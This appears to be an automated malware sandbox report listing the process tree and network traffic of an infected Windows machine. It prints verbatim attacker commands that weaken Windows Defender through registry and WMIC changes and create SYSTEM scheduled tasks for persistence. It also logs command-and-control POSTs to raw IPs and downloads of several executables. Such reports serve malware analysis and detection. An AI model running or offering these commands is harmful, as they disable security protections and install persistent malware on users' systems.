  - Command and Scripting Interpreter: PowerShell
  [2] PID 5524  C:\Windows\system32\gpupdate.exe | "C:\Windows\system32\gpupdate.exe" /force
[1] PID 5780  C:\Windows\system32\gpscript.exe | gpscript.exe /RefreshSystemParam
[1] PID 5264  C:\Windows\windefender.exe | C:\Windows\windefender.exe
[1] PID 1540  C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\PywzyBK.exe | C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\PywzyBK.exe GH /vbYLdidcG 385118 /S
  [2] PID 5512  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:5132
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:2800
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:3820
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:4844
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:3292
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:4572
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:5708
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:2272
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:3004
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:3280
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:5600
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:3844
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1908
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:5876
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
PID:1008 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:4880
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"2⤵PID:3864
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:4136
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:2164
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:5204
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
PID:6024 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵PID:5824
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\bxAyNb.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F2⤵
- Creates scheduled task(s)
PID:5932
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\GUmDGCh.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5712
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FPieTEPPuEmJrhC"2⤵PID:5136
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FPieTEPPuEmJrhC"2⤵PID:2008
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4760
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\BrifWVG.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5496
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\AmVjuQH.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\ilJdFch.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2528
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\QaNfTzx.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5800
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rrqYunoktxOQmCoCX" /SC once /ST 03:29:52 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\KMDStJvZ\ykLJqBG.dll\",#1 /odidZWiT 385118" /V1 /F2⤵
- Creates scheduled task(s)
PID:1432
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "rrqYunoktxOQmCoCX"2⤵PID:4604
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"2⤵PID:5872
-
-
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\FHAVoFv.exeC:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\FHAVoFv.exe GH /BJPYdidQd 385118 /S1⤵PID:5592
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:5484
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:5992
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:5952
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:6028
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:3644
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:1184
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:424
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:5384
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:972
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:5612
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:3184
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:3776
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1500
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:6036
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:5972
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
PID:5168 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:4716
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:1992
-
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"2⤵PID:5172
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:3760
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:2036
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:1228
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
PID:1088 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵PID:1476
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\ykuvci.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F2⤵
- Creates scheduled task(s)
PID:2444
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:5376
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\KMDStJvZ\ykLJqBG.dll",#1 /odidZWiT 3851181⤵PID:4160
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\KMDStJvZ\ykLJqBG.dll",#1 /odidZWiT 3851182⤵PID:716
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rrqYunoktxOQmCoCX"3⤵PID:1416
-
-
Network
-
Remote address:5.42.96.141:80RequestPOST /go34ko8/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.141
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:40:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
Remote address:5.42.96.141:80RequestPOST /go34ko8/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.141
Content-Length: 160
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:40:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.96.141:80RequestPOST /go34ko8/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.141
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:40:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.96.141:80RequestPOST /go34ko8/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.141
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:40:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.96.141:80RequestPOST /go34ko8/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.141
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:40:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.96.7:80RequestGET /cost/sarra.exe HTTP/1.1
Host: 5.42.96.7
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:40:29 GMT
Content-Type: application/octet-stream
Content-Length: 2433536
Last-Modified: Sun, 12 May 2024 03:18:15 GMT
Connection: keep-alive
ETag: "664034f7-252200"
Accept-Ranges: bytes
-
Remote address:5.42.96.7:80RequestGET /mine/amers.exe HTTP/1.1
Host: 5.42.96.7
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:40:33 GMT
Content-Type: application/octet-stream
Content-Length: 1918464
Last-Modified: Sun, 12 May 2024 03:19:12 GMT
Connection: keep-alive
ETag: "66403530-1d4600"
Accept-Ranges: bytes
-
Remote address:5.42.96.7:80RequestGET /cost/random.exe HTTP/1.1
Host: 5.42.96.7
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:40:36 GMT
Content-Type: application/octet-stream
Content-Length: 2310160
Last-Modified: Sun, 12 May 2024 03:17:47 GMT
Connection: keep-alive
ETag: "664034db-234010"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Request141.96.42.5.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request7.96.42.5.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request78.96.42.5.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request19.128.172.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request19.128.172.185.in-addr.arpaIN PTR
-
Remote address:5.42.96.7:80RequestPOST /zamo7h/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.7
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:40:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
Remote address:5.42.96.7:80RequestPOST /zamo7h/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.7
Content-Length: 160
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:40:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.96.7:80RequestPOST /zamo7h/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.7
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:40:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.96.7:80RequestPOST /zamo7h/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.7
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:41:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.96.78:80RequestGET /files/file300un.exe HTTP/1.1
Host: 5.42.96.78
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Sat, 11 May 2024 21:18:01 GMT
ETag: "1e94309-618342fe7897a"
Accept-Ranges: bytes
Content-Length: 32064265
Content-Type: application/x-msdownload
-
Remote address:185.172.128.19:80RequestGET /NewB.exe HTTP/1.1
Host: 185.172.128.19
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:41:00 GMT
Content-Type: application/octet-stream
Content-Length: 428544
Last-Modified: Thu, 09 Nov 2023 18:10:51 GMT
Connection: keep-alive
ETag: "654d20ab-68a00"
Accept-Ranges: bytes
-
Remote address:185.172.128.19:80RequestPOST /ghsdh39s/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.19
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:41:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.172.128.19:80RequestPOST /ghsdh39s/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.19
Content-Length: 160
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:41:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.172.128.19:80RequestPOST /ghsdh39s/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.19
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:41:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.172.128.59:80RequestGET /ISetup8.exe HTTP/1.1
Host: 185.172.128.59
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Sun, 12 May 2024 04:30:01 GMT
ETag: "60a01-6183a38e03b88"
Accept-Ranges: bytes
Content-Length: 395777
Content-Type: application/x-msdos-program
-
Remote address:8.8.8.8:53Request59.128.172.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request90.128.172.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request45.87.157.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request45.87.157.20.in-addr.arpaIN PTR
-
Remote address:185.172.128.90:80RequestGET /cpa/ping.php?substr=eight&s=ab&sub=0 HTTP/1.1
Host: 185.172.128.90
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
ResponseHTTP/1.0 500 Internal Server Error
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
-
Remote address:185.172.128.228:80RequestGET /ping.php?substr=eight HTTP/1.1
Host: 185.172.128.228
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
-
Remote address:185.172.128.59:80RequestGET /syncUpd.exe HTTP/1.1
Host: 185.172.128.59
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Sun, 12 May 2024 04:30:01 GMT
ETag: "3b800-6183a38de5727"
Accept-Ranges: bytes
Content-Length: 243712
Content-Type: application/x-msdos-program
-
Remote address:8.8.8.8:53Request228.128.172.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestsvc.iolo.comIN AResponsesvc.iolo.comIN A20.157.87.45
-
Remote address:8.8.8.8:53Request150.128.172.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestpastebin.comIN AResponsepastebin.comIN A104.20.3.235pastebin.comIN A172.67.19.24pastebin.comIN A104.20.4.235
-
Remote address:8.8.8.8:53Request235.3.20.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestonlycitylink.comIN AResponseonlycitylink.comIN A104.21.18.166onlycitylink.comIN A172.67.182.192
-
Remote address:8.8.8.8:53Requestjonathantwo.comIN AResponsejonathantwo.comIN A104.21.31.124jonathantwo.comIN A172.67.176.131
-
Remote address:8.8.8.8:53Request166.18.21.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request86.2.147.190.in-addr.arpaIN PTRResponse86.2.147.190.in-addr.arpaIN PTRstatic-ip-cr190147286cablenetco
-
Remote address:8.8.8.8:53Requestipinfo.ioIN AResponseipinfo.ioIN A34.117.186.192
-
Remote address:8.8.8.8:53Request192.186.117.34.in-addr.arpaIN PTRResponse192.186.117.34.in-addr.arpaIN PTR19218611734bcgoogleusercontentcom
-
Remote address:8.8.8.8:53Requestwestus2-2.in.applicationinsights.azure.comIN AResponsewestus2-2.in.applicationinsights.azure.comIN CNAMEwestus2-2.in.ai.monitor.azure.comwestus2-2.in.ai.monitor.azure.comIN CNAMEwestus2-2.in.ai.privatelink.monitor.azure.comwestus2-2.in.ai.privatelink.monitor.azure.comIN CNAMEgig-ai-prod-westus2-0.trafficmanager.netgig-ai-prod-westus2-0.trafficmanager.netIN CNAMEgig-ai-prod-wus2-0-app-v4-tag.westus2.cloudapp.azure.comgig-ai-prod-wus2-0-app-v4-tag.westus2.cloudapp.azure.comIN A20.9.155.145
-
Remote address:8.8.8.8:53Requestnexusrules.officeapps.live.comIN AResponsenexusrules.officeapps.live.comIN CNAMEprod.nexusrules.live.com.akadns.netprod.nexusrules.live.com.akadns.netIN A52.111.227.13
-
Remote address:8.8.8.8:53Request45707d7f-925a-4cab-937b-d86c5ca14e6d.uuid.realupdate.ruIN TXTResponse
-
Remote address:8.8.8.8:53Requestcdn.discordapp.comIN AResponsecdn.discordapp.comIN A162.159.130.233cdn.discordapp.comIN A162.159.129.233cdn.discordapp.comIN A162.159.133.233cdn.discordapp.comIN A162.159.134.233cdn.discordapp.comIN A162.159.135.233
-
Remote address:8.8.8.8:53Request129.250.125.74.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request96.216.82.185.in-addr.arpaIN PTRResponse96.216.82.185.in-addr.arpaIN PTRdedic-mariadebommarez-1201693hosted-by-itldccom
-
Remote address:8.8.8.8:53Request121.150.80.3.in-addr.arpaIN PTRResponse121.150.80.3.in-addr.arpaIN PTRec2-3-80-150-121 compute-1 amazonawscom
-
Remote address:8.8.8.8:53Request99.56.20.217.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestwww.googleapis.comIN AResponsewww.googleapis.comIN A142.250.187.202www.googleapis.comIN A142.250.187.234www.googleapis.comIN A142.250.178.10www.googleapis.comIN A172.217.16.234www.googleapis.comIN A142.250.200.10www.googleapis.comIN A142.250.200.42www.googleapis.comIN A216.58.201.106www.googleapis.comIN A216.58.204.74www.googleapis.comIN A172.217.169.10www.googleapis.comIN A172.217.169.42www.googleapis.comIN A142.250.179.234www.googleapis.comIN A142.250.180.10
-
Remote address:8.8.8.8:53Request202.187.250.142.in-addr.arpaIN PTRResponse202.187.250.142.in-addr.arpaIN PTRlhr25s33-in-f101e100net
-
Remote address:8.8.8.8:53Requestapi2.check-data.xyzIN AResponseapi2.check-data.xyzIN CNAMEcheckdata-1114476139.us-west-2.elb.amazonaws.comcheckdata-1114476139.us-west-2.elb.amazonaws.comIN A35.82.94.151checkdata-1114476139.us-west-2.elb.amazonaws.comIN A44.237.26.169
-
Remote address:185.172.128.228:80RequestGET /BroomSetup.exe HTTP/1.1
Host: 185.172.128.228
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT
ETag: "4a4030-613b1bf118700"
Accept-Ranges: bytes
Content-Length: 4866096
